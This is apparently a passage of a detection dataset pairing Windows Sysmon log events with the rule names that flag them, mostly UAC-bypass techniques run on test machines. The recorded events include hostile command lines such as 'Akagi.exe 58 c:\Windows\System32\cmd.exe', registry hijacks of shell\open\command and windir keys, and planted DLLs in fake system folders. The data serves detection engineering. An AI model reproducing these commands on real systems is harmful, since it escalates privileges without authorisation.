\\System32\\winSAT.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D21D-5D3C-0000-0020EE5B2300","LogonId":"0x235bee","ParentCommandLine":"\"C:\\Users\\IEUser\\Downloads\\UACBypass.exe\" ","ParentImage":"C:\\Users\\IEUser\\Downloads\\UACBypass.exe","ParentProcessGuid":"747F3D96-D39D-5D3C-0000-001026F55500","ParentProcessId":6632,"ProcessGuid":"747F3D96-D39E-5D3C-0000-0010805A5600","ProcessId":3904,"Product":"Microsoft® Windows® Operating System","RuleName":"PrivEsc - UACBypass Mocking Trusted WinFolders","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-27 22:43:42.354"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4730,"Execution_attributes":{"ProcessID":2748,"ThreadID":3376},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-27T22:43:42.392880Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["TrustedPath UAC Bypass Pattern"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=7CE46211A5A8D7FE4A767E12BD80769673FDAEE5,MD5=7F8A2B842948EB70133FA34F0CFE772B,SHA256=078CA38607F24FD21A563FA5189843734677B98D5017D5EBB03B2960053B25B5,IMPHASH=14E2B78EE82AD03FAC47525FEDDCA7E6","Image":"C:\\Windows \\System32\\winSAT.exe","ImageLoaded":"C:\\Windows \\System32\\WINMM.dll","ProcessGuid":"747F3D96-D39E-5D3C-0000-0010805A5600","ProcessId":3904,"Product":"?","RuleName":"PrivEsc - UACBypass Mocking Trusted WinFolders","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-07-27 
22:43:42.661"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4732,"Execution_attributes":{"ProcessID":2748,"ThreadID":3384},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-07-27T22:43:43.016956Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\Windows\\System32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-095D-5EB4-0000-001082FF1700","ProcessId":7084,"RuleName":"PrivEsc - T1088 - UACBypass - changepk UACME61","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Launcher.SystemSettings\\shell\\open\\command\\(Default)","UtcTime":"2020-05-07 13:13:01.680"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":112814,"Execution_attributes":{"ProcessID":2888,"ThreadID":3384},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-05-07T13:13:01.683498Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 09:50:08.491","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-9AD0-5CD6-0000-001077FC1600","ProcessId":1136,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\CRYPTBASE.dll","UtcTime":"2019-05-11 09:50:08.491"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15875,"Execution_attributes":{"ProcessID":2000,"ThreadID":1748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T09:50:08.491568Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 09:50:13.464","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-9AD5-5CD6-0000-0010C4131700","ProcessId":3716,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-11 
09:50:13.464"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15877,"Execution_attributes":{"ProcessID":2000,"ThreadID":1748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T09:50:13.509892Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-BDD1-5EC9-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"c:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-CA4E-5EC9-0000-00109FE23700","ParentProcessId":1516,"ProcessGuid":"747F3D96-CA52-5EC9-0000-001027FA3700","ProcessId":4456,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-24 
01:13:54.117"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":196375,"Execution_attributes":{"ProcessID":2812,"ThreadID":3656},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-05-24T01:13:54.120170Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Taskmgr as Parent"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\","Description":"Windows Command Processor","FileVersion":"10.0.18362.449 (WinBuild.160101.0800)","Hashes":"SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8C36-5F75-0000-002034E39103","LogonId":"0x391e334","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\windows\\system32\\taskmgr.exe","ParentImage":"C:\\Windows\\System32\\Taskmgr.exe","ParentProcessGuid":"00247C92-858E-5F7B-0000-00105241202B","ParentProcessId":18404,"ProcessGuid":"00247C92-858E-5F7B-0000-0010E741202B","ProcessId":6636,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-10-05 
20:43:58.450"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2164892,"Execution_attributes":{"ProcessID":5424,"ThreadID":6708},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-05T20:43:58.451314Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"POC.exe","Company":"","CurrentDirectory":"C:\\Users\\Public\\POC\\bin\\Debug\\","Description":"SearchIndexer","FileVersion":"1.0.0.0","Hashes":"SHA1=3DA62D5328C591481C9C262BC3A77E5FF32EDBB6,MD5=15661E68D8031891DF6E0E70B547AEBB,SHA256=BEF67963D92D027E39CC5FC927805A4EBFE58C2121BA9396356EF0CE257D0C92,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Users\\Public\\POC\\bin\\Debug\\POC.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-18F5-5F76-0000-002073A80500","LogonId":"0x5a873","OriginalFileName":"POC.exe","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1EB6-5F76-0000-00101DF51D00","ParentProcessId":8072,"ProcessGuid":"747F3D96-2156-5F76-0000-0010DBE82500","ProcessId":4696,"Product":"SearchIndexer","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-01 
18:35:02.413"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":410485,"Execution_attributes":{"ProcessID":3308,"ThreadID":4656},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-01T18:35:02.415351Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"Program","Company":"","CurrentDirectory":"C:\\Users\\Public\\POC\\bin\\Debug\\","Description":"SearchIndexer","FileVersion":"1.0.0.0","Hashes":"SHA1=3DA62D5328C591481C9C262BC3A77E5FF32EDBB6,MD5=15661E68D8031891DF6E0E70B547AEBB,SHA256=BEF67963D92D027E39CC5FC927805A4EBFE58C2121BA9396356EF0CE257D0C92,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Users\\Public\\POC\\bin\\Debug\\POC.exe","IntegrityLevel":"AppContainer","LogonGuid":"747F3D96-18F5-5F76-0000-002073A80500","LogonId":"0x5a873","OriginalFileName":"POC.exe","ParentCommandLine":"POC.exe","ParentImage":"C:\\Users\\Public\\POC\\bin\\Debug\\POC.exe","ParentProcessGuid":"747F3D96-2156-5F76-0000-0010DBE82500","ParentProcessId":4696,"ProcessGuid":"747F3D96-2156-5F76-0000-00100EEC2500","ProcessId":5448,"Product":"SearchIndexer","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-01 
18:35:02.605"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":410486,"Execution_attributes":{"ProcessID":3308,"ThreadID":4656},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-01T18:35:02.606952Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-01 18:35:02.768","Image":"C:\\Windows\\System32\\RuntimeBroker.exe","ProcessGuid":"747F3D96-1903-5F76-0000-0010B85E0900","ProcessId":6932,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\abc.txt","UtcTime":"2020-10-01 18:35:02.768"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":410487,"Execution_attributes":{"ProcessID":3308,"ThreadID":4656},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-01T18:35:02.775302Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host 
Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-5461-5EBA-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":580,"ProcessGuid":"747F3D96-DE32-5EB9-0000-00103FC14300","ProcessId":5252,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-11 23:22:26.451"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":142033,"Execution_attributes":{"ProcessID":2896,"ThreadID":3548},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-05-11T23:22:26.650196Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\Public\\psexecprivesc.exe\" 
C:\\Windows\\System32\\mspaint.exe","Company":"?","CurrentDirectory":"C:\\Users\\Public\\","Description":"?","FileVersion":"?","Hashes":"SHA1=D7BADB1E51B7F5AB36D218854698215436C77D69,MD5=45C9D210322AC8F8AEC6D2AB003F82A9,SHA256=F60E25BFB2BF7CB3E3CBD47F6A6D12941BD0BC0CF5B5626415607FDF0ACD2132,IMPHASH=6BC87C5562804B37769BD928D309AFDA","Image":"C:\\Users\\Public\\psexecprivesc.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-FBCC-5FD0-0000-0020CB857400","LogonId":"0x7485cb","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-FBFF-5FD0-0000-0010BEC87C00","ParentProcessId":14512,"ProcessGuid":"747F3D96-00D2-5FD1-0000-0010FA4C5301","ProcessId":13004,"Product":"?","RuleName":"","TerminalSessionId":3,"User":"MSEDGEWIN10\\user02","UtcTime":"2020-12-09 16:52:34.559"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":549480,"Execution_attributes":{"ProcessID":3572,"ThreadID":5040},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-12-09T16:52:34.562791Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["PsExec Service Start"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\PSEXESVC.exe","Company":"Sysinternals","CurrentDirectory":"C:\\Windows\\system32\\","Description":"PsExec 
Service","FileVersion":"2.2","Hashes":"SHA1=A17C21B909C56D93D978014E63FB06926EAEA8E7,MD5=75B55BB34DAC9D02740B9AD6B6820360,SHA256=141B2190F51397DBD0DFDE0E3904B264C91B6F81FEBC823FF0C33DA980B69944,IMPHASH=67012475995FB9027F4511245B57DDEA","Image":"C:\\Windows\\PSEXESVC.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-76FA-5FD1-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"psexesvc.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":632,"ProcessGuid":"747F3D96-00D9-5FD1-0000-001021855301","ProcessId":16344,"Product":"Sysinternals PsExec","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-12-09 16:52:41.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":549482,"Execution_attributes":{"ProcessID":3572,"ThreadID":5040},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-12-09T16:52:41.861437Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Tool UACMe"],"event":{"Event":{"EventData":{"CommandLine":"Akagi.exe 58 c:\\Windows\\System32\\cmd.exe","Company":"Hazardous Environments","CurrentDirectory":"C:\\Users\\IEUser\\Tools\\PrivEsc\\","Description":"UACMe main 
module","FileVersion":"3.2.5.2005","Hashes":"SHA1=874C9878FF9C1A9AC60658E83649370EA4E61829,MD5=FD17237A6B50C51CBEB45A28E0284063,SHA256=B4E9DCFC87014B2B70CC9E3CD4E34AE4425E40C81A2ED008C7D335E3F96ADD19,IMPHASH=FF31A97D8C8EBEBDA4D7B3DF95E756F1","Image":"C:\\Users\\IEUser\\Tools\\PrivEsc\\Akagi.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-B086-5EBA-0000-0020EF9E0800","LogonId":"0x89eef","OriginalFileName":"Akagi.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-B093-5EBA-0000-0010E7350E00","ParentProcessId":6708,"ProcessGuid":"747F3D96-BB89-5EBA-0000-001057413600","ProcessId":1036,"Product":"UACMe","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-05-12 15:06:49.006"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":143173,"Execution_attributes":{"ProcessID":2856,"ThreadID":3608},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-05-12T15:06:49.019031Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\DNeruK","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-BB89-5EBA-0000-001057413600","ProcessId":1036,"RuleName":"PrivEsc - Rogue Windir - UAC bypass prep","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\windir","UtcTime":"2020-05-12 
15:06:49.118"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":143174,"Execution_attributes":{"ProcessID":2856,"ThreadID":3608},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-05-12T15:06:49.183867Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-05-12 15:06:49.134","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-BB89-5EBA-0000-001057413600","ProcessId":1036,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\DNeruK\\system32\\Clipup.exe","UtcTime":"2020-05-12 15:06:49.134"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":143175,"Execution_attributes":{"ProcessID":2856,"ThreadID":3608},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-05-12T15:06:49.184059Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 16:54:02.305","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-FE2A-5CD6-0000-00107E091700","ProcessId":2028,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\CRYPTBASE.dll","UtcTime":"2019-05-11 16:54:02.305"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15987,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T16:54:02.305766Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 16:54:07.462","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-FE2F-5CD6-0000-001019201700","ProcessId":2956,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-11 
16:54:07.462"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15989,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T16:54:07.524516Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"byeintegrity5-uac.exe","Company":"?","CurrentDirectory":"C:\\Users\\Public\\tools\\privesc\\uac\\","Description":"?","FileVersion":"?","Hashes":"SHA1=DF21EC2A3D7EE2AE853C29CBD8AB774A78ED7BF4,MD5=8671D1F95CC31E33F61DEF8C99B42B64,SHA256=2D41A174EA0589F39AA267F829870131AE18CFF1B19648C118DC5A00AEAF078B,IMPHASH=EA12F696E9727F4454BA1EFA0CAFAD2D","Image":"C:\\Users\\Public\\tools\\privesc\\uac\\byeintegrity5-uac.exe","IntegrityLevel":"Medium","LogonGuid":"00247C92-3404-5FBE-0000-002044CA0600","LogonId":"0x6ca44","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"00247C92-BB27-5FBF-0000-0010F69CFA0A","ParentProcessId":12228,"ProcessGuid":"00247C92-E803-5FBF-0000-0010D1B5B40C","ProcessId":11644,"Product":"?","RuleName":"","TerminalSessionId":1,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-11-26 
17:38:11.137"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2362764,"Execution_attributes":{"ProcessID":5900,"ThreadID":6484},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-11-26T17:38:11.138458Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-11-26 17:38:11.146","Image":"C:\\Users\\Public\\tools\\privesc\\uac\\byeintegrity5-uac.exe","ProcessGuid":"00247C92-E803-5FBF-0000-0010D1B5B40C","ProcessId":11644,"RuleName":"","TargetFilename":"C:\\Users\\Public\\tools\\privesc\\uac\\system32\\npmproxy.dll","UtcTime":"2020-11-26 